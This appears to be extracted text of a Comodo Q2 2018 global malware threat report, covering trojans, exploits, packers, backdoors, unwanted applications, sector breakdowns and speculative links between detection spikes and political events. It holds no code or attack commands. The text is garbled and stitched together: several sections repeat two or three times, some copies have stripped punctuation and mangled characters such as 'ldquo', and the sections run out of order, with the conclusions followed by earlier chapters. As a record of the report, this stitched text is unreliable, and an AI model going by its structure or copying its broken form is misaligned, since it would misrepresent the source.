523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
5.3.2 Packers
"Packed" malware refers to any means of hiding or obfuscating malicious executable code by compressing, or "packing", it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often carries its own decompression code, or even a self-extracting archive, which recreates the original code from the compressed data and then executes the malware. Encryption may also be used to conceal the malware from security software as another means of obfuscating the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, whose decompressor is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
This timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically labeled only a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
Finally, this timeline shows that far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider, and/or perform other actions users might not have intended. Such software includes free toolbars, adware, and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
As this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US (and to a lesser extent Ukraine) had a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place at the same time as the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics, or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals' bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
This timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are second and third, respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6. Vertical Analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7. Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
8. Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
